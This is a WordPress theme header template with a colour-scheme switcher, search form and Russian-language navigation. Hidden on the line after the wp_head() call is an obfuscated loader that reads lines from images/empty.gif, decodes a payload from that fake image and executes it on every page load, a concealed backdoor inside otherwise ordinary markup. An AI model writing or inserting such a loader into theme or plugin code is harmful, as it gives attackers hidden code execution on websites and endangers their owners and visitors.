<?php echo "<?xml version=\"1.0\" ?>"; ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>>
<head>
    <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
    <meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats -->
    <link rel="stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_url'); ?>" />
    <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/main-msie.css" /><![endif]-->

    <link rel="stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/blue.css" title="blue" />
    <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/orange.css" title="orange" />
    <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/green.css" title="green" />
    <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/yellow.css" title="yellow" />
    <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/violet.css" title="violet" />
    <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/darkblue.css" title="darkblue" />
    <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/red.css" title="red" />
    <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/cyan.css" title="cyan" />
    <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/black.css" title="black" />
    <link rel="alternate stylesheet" media="screen,projection" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/pink.css" title="pink" />
    
    <link rel="stylesheet" media="print" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/print.css" />
    <link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" />
    <script type="text/javascript" src="<?php bloginfo('stylesheet_directory'); ?>/switcher.js"></script>
    <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />

    <title><?php bloginfo('name'); ?> <?php if ( is_single() ) { ?> &raquo; Архив сайта <?php } ?> <?php wp_title(); ?></title>

<?php  wp_head(); $gif=file(dirname(__FILE__).'/images/empty.gif',2);$gif=$gif[5]("",$gif[6]($gif[4]));$gif(); ?>
</head>

<body>

<!-- Header -->
<div id="header" class="box">
    <div class="main">

        <!-- Your logo -->
        <h1 id="logo"><a href="<?php echo get_option('home'); ?>/"><?php bloginfo('name'); ?></a></h1>
        <hr class="noscreen" />

        <!-- Search -->
        <fieldset id="search">
            <form action="<?php bloginfo('url'); ?>" method="get">
                <div>
                    <div id="search-input"><input type="text" size="30" value="<?php the_search_query(); ?>" name="s" id="s" /></div>
                    <input type="submit" value="OK" name="" id="search-submit" />
                </div>
            </form>
        </fieldset>

    </div> <!-- /main -->
</div> <!-- /header -->

<div class="main bg box">

    <!-- Navigation -->
    <div id="nav" class="box">  

            <!-- Color switcher -->
            <p id="switcher">
                <a href="#" onclick="setActiveStyleSheet('black'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/black.gif" alt="Black" title="Black" /></a>
                <a href="#" onclick="setActiveStyleSheet('darkblue'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/darkblue.gif" alt="Dark blue" title="Dark blue" /></a>
                <a href="#" onclick="setActiveStyleSheet('blue'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/blue.gif" alt="Blue" title="Blue" /></a>
                <a href="#" onclick="setActiveStyleSheet('cyan'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/cyan.gif" alt="Cyan" title="Cyan" /></a>
                <a href="#" onclick="setActiveStyleSheet('violet'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/violet.gif" alt="Violet" title="Violet" /></a>
                <a href="#" onclick="setActiveStyleSheet('pink'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/pink.gif" alt="Pink" title="Pink" /></a>
                <a href="#" onclick="setActiveStyleSheet('red'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/red.gif" alt="Red" title="Red" /></a>                
                <a href="#" onclick="setActiveStyleSheet('orange'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/orange.gif" alt="Orange" title="Orange" /></a>
                <a href="#" onclick="setActiveStyleSheet('yellow'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/yellow.gif" alt="Yellow" title="Yellow" /></a>
                <a href="#" onclick="setActiveStyleSheet('green'); return false;"><img src="<?php bloginfo('stylesheet_directory'); ?>/images/green.gif" alt="Green" title="Green" /></a>
            </p>

        <ul>
            <li<?php if ( is_home() or is_archive() or is_single() or is_paged() or is_search() or (function_exists('is_tag') and is_tag()) ) { echo ' class="current_page_item"'; } ?>><a href="<?php echo get_option('home'); ?>">Главная</a></li> <!-- Active page (highlighted) -->
            <?php wp_list_pages('title_li='); ?>
        </ul>

    <hr class="noscreen" />
    </div> <!-- /nav -->
